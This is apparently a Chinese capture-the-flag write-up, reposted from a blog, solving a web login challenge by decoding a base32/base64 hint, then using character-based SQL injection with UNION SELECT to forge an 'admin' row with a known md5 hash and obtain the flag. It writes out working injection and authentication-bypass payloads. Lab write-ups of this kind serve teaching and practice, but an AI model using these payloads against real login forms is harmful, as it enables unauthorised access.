本文介绍: 通过用户所在列测试得出存在用户admin,又得出admin用户在第二列,也就是username字段那一列。猜测’or关键字或’=’字符过滤发现参数passwordmd5加密。大致就是传进去的值要进行md5值加密。但是要对传入的那个值进行md5值加密网上可以随便找一个在线md5加密平台可以得出此题的注入点是参数name可以得出此题的注入类型字符型注入。通过测试发现是套加密(二次加密通过对这段SQL语句的初步判断。看着和之前做过的题很类似。在注释那里发现某种编码repeater放包。

题目环境
image.png
burp抓包

随便输入

image.png
repeater放包
image.png

注释那里发现某种编码

MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5

看着像是base编码格式
通过测试发现是套加密(二次加密
首先使用base32对此编码进行解码

base32解码
image.png
c2VsZWN0ICogZnJvbSB1c2VyIHdoZXJlIHVzZXJuYW1lID0gJyRuYW1lJw==

两个等号base64编码无疑了

base64解码
image.png

得到一段SQL查询语句

select * from user where username = '$name'

通过对这段SQL语句的初步判断
可以得出此题的注入点是参数name

判断注入类型

1
123

image.png

1’
123

image.png

发生报错
可以得出此题的注入类型为字符型注入

尝试万能密码

1’ or ‘1’=’1
123

image.png

猜测’or关键字或’=’字符被过滤

口令猜测

首先猜测用户名既有可能是admin
密码暂且还不知道

判断字段

1’ union select 1,2#
123

image.png

1’ union select 1,2,3#
123

image.png

可知字段数是3

判断用户所在列

1’ union selectadmin’,2,3#
123

image.png

1’ union select 1,‘admin’,3#
123

image.png

通过用户所在列测试得出存在用户admin,又得出了admin用户在第二列,也就是username字段那一列。

查看题目源码
image.png

search.php源代码哪里发现关键代码

image.png

if($arr[1] == "admin"){
			if(md5($password) == $arr[2]){
				echo $flag;
			}
			else{
				die("wrong pass!");
			}
		}

发现参数password被md5加密
看着和之前做过的题很类似
大致就是传进去的值要进行md5值加密

换种方式猜测
username数据表里面的3个字段分别是flagnamepassword
猜测只有password字段位NULL
咱们给参数password传入的值是123
那么传进去后,后台就会把123进行md5值加密并存放到password字段当中
我们使用查询语句的时候
我们pw参数的值会被md5值进行加密
然后再去与之前存入password中的md5值进行比较
如果相同就会输出flag

flag

这里pw参数的值为123456
可以随便传
但是要对传入的那个值进行md5值加密
网上可以随便找一个在线md5加密平台

1’union select 1,‘admin’,‘e10adc3949ba59abbe56e057f20f883e’#
123456

image.png
得出flag
flag{3c7be44e-df35-40a7-bd91-1b210bf75fcb}

原文地址:https://blog.csdn.net/m0_73734159/article/details/134710609

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任

如若转载,请注明出处:http://www.7code.cn/show_18369.html

如若内容造成侵权/违法违规/事实不符,请联系代码007邮箱suwngjj01@126.com进行投诉反馈,一经查实,立即删除

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注